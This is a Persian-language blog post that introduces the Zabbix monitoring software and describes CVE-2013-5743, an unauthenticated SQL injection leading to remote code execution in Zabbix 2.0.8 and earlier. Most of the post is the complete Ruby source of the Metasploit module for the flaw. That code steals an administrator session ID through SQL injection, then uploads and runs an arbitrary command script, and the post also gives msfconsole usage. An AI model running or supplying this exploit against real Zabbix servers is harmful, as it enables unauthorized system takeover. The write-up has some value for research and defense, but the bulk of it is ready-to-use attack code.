آسیب پذیری در Zabbix

آسیب پذیری در Zabbix

ابتدا مختصر توضیحی در رابطه با نرم افزار Zabbix بدهیم برای افرادی که اشنا نیستند

یک نرم‌ افزار متن باز که در تاریخ آوریل 19 آوریل 2001 به منظر پایش و داشتن نظارت و بررسی کامل لحظه ایی بر روی شبکه ‌ها و نرم‌افزار ها در سطح Enterprise توسط اقای وسط الکسی ولادیشو ارائه شده است. این نرم‌افزار برای پایش و تشخیص وضعیت سرویس‌های شبکه‌ها، سرورها و دیگر سخت افزارهای شبکه طراحی شده‌است.

دو آسیب پذیری Sql injection و Remote Code Execution در Zabbix نسخه 2.0.8 و نسخه های پایین تر

از این بابت در Zabbix فرد مهاجم توانایی تزریق Sql و انجام حمله Sql injection را دارد. از این رو اگر برای یک کاربر سطح Administrators مشخص شود کاربر با Upload سازی اسکریپت های از راه دور از طریق فایل scripts_exec.php، توانایی اجرای دستورات خود را از راه دور دارد و این کار موجب ایجاد شدن آسیب پذیری RCE مخفف Remote Code Execution شده است. ‌Exploit این آسیب پذیری در Metasploit قابل بهرداری می باشد.

برای دسترسی به Exploit این آسیب پذیری به مسیر زیر بروید

msf5 > use exploit/linux/http/zabbix_sqli 
msf5 exploit(linux/http/zabbix_sqli) >

Source-Code Exploit:

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking    include Msf::Exploit::Remote::HttpClient   include Msf::Exploit::FileDropper    def initialize(info={}) super(update_info(info,       'Name'           => &quotZabbix 2.0.8 SQL Injection and Remote Code Execution&quot,       'Description'    => %q{         This module exploits an unauthenticated SQL injection vulnerability affecting Zabbix         versions 2.0.8 and lower.  The SQL injection issue can be abused in order to retrieve an         active session ID.  If an administrator level user is identified, remote code execution         can be gained by uploading and executing remote scripts via the 'scripts_exec.php' file.       },       'License'        => MSF_LICENSE,       'Author'         =>         [           'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept 'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module        ],       'References'     =>         [           ['CVE', '2013-5743'],           ['URL', 'https://support.zabbix.com/browse/ZBX-7091']         ],       'Platform'       => ['unix'],       'Arch'           => ARCH_CMD,       'Targets'        =>         [           ['Zabbix version <= 2.0.8', {}]         ],       'Privileged'     => false,       'Payload'        =>         {           'Space'       => 255,           'DisableNops' => true,           'Compat'      =>             {               'PayloadType' => 'cmd',               'RequiredCmd' => 'generic perl python'            }         },       'DisclosureDate' => &quotSep 23 2013&quot,       'DefaultTarget'  => 0))        register_options(         [           OptString.new('TARGETURI', [true, 'The URI of the vulnerable Zabbix instance', '/zabbix'])         ])   end def uri return target_uri.path   end def check # Check version    vprint_status(&quotTrying to detect installed version&quot)      res = send_request_cgi({       'method' => 'GET',       'uri'    => normalize_uri(uri, &quothttpmon.php&quot)     })      if res and res.code == 200 and res.body =~ /(STATUS OF WEB MONITORING)/ and res.body =~ /(?<=Zabbix )(.*)(?= Copyright)/      version = $1       vprint_status(&quotZabbix version #{version} detected&quot)     else # If this fails, guest access may not be enabled      vprint_status(&quotUnable to access httpmon.php&quot)       return Exploit::CheckCode::Unknown     end if version and version <= &quot2.0.8&quot return Exploit::CheckCode::Appears     else return Exploit::CheckCode::Safe     end end def get_session_id # Generate random string and convert to hex    sqlq = rand_text_alpha(8)     sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join     sqli = &quot2 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST&quot    sqli << &quot(sessionid AS CHAR),0x20)),1,50) FROM zabbix.sessions WHERE status=0 and userid=1 &quot    sqli << &quotLIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quot # Extract session id from database    res = send_request_cgi({       'method' => 'GET',       'uri'    => normalize_uri(&quot#{uri}&quot, &quothttpmon.php&quot),       'vars_get' => {         &quotapplications&quot => sqli       }     })      if res && res.code == 200 and res.body =~ /(?<=#{sqlq})(.*)(?=#{sqlq})/      session = $1       print_status(&quotExtracted session cookie - [ #{session} ]&quot)       return session     else      fail_with(Failure::Unknown, &quot#{peer} - Unable to extract a valid session&quot)     end end def exploit # Retrieve valid session id    @session = get_session_id     @sid = &quot#{@session[16..-1]}&quot    script_name = rand_text_alpha(8)     # Upload script    print_status(&quotAttempting to inject payload&quot)     res = send_request_cgi({       'method' => 'POST',       'cookie' => &quotzbx_sessionid=#{@session}&quot,       'uri'    => normalize_uri(uri, &quotscripts.php&quot),       'vars_post' => {         'sid' => @sid,         'form' => 'Create+script',         'name' => script_name,         'type' => '0',         'execute_on' => '1',         'command' => payload.encoded,         'commandipmi' => '',         'description' => '',         'usrgrpid' => '0',         'groupid' => '0',         'access' => '2',         'save' => 'Save'      }     })      if res and res.code == 200 and res.body =~ /(Script added)/      print_good(&quotPayload injected successfully&quot)     else      fail_with(Failure::Unknown, &quot#{peer} - Payload injection failed!&quot)     end # Extract 'scriptid' value    @scriptid = /(?<=scriptid=)(\d+)(?=&sid=#{@sid}&quot>#{script_name})/.match(res.body)      # Trigger Payload    res = send_request_cgi({       'method' => 'GET',       'uri'    => normalize_uri(&quot#{uri}&quot, &quotscripts_exec.php&quot),       'cookie' => &quotzbx_sessionid=#{@session}&quot,       'vars_get' => {         &quotexecute&quot =>1,         &quotscriptid&quot => @scriptid,         &quotsid&quot => @sid,         &quothostid&quot => &quot10084&quot      }     })   end def cleanup    post_data = &quotsid=#{@sid}&form_refresh=1&scripts[#{@scriptid}]=#{@scriptid}&go=delete&goButton=Go (1)&quot    print_status(&quotCleaning script remnants&quot)     res = send_request_cgi({      'method' => 'POST',       'data'   => post_data,       'cookie' => &quotzbx_sessionid=#{@session}&quot,       'uri'    => normalize_uri(uri, &quotscripts.php&quot)     })      if res and res.code == 200 and res.body =~ /(Script deleted)/      print_good(&quotScript removed successfully&quot)     else      print_warning(&quotUnable to remove script #{@scriptid}&quot)     end end end

Github: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/zabbix_sqli.rb

description:

ID MSF:EXPLOIT/LINUX/HTTP/ZABBIX_SQLI

Type metasploit

Reporter Rapid7

Modified 2017-07-24 13:26:21

CVSS 7.5

References:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5743

https://support.zabbix.com/browse/ZBX-7091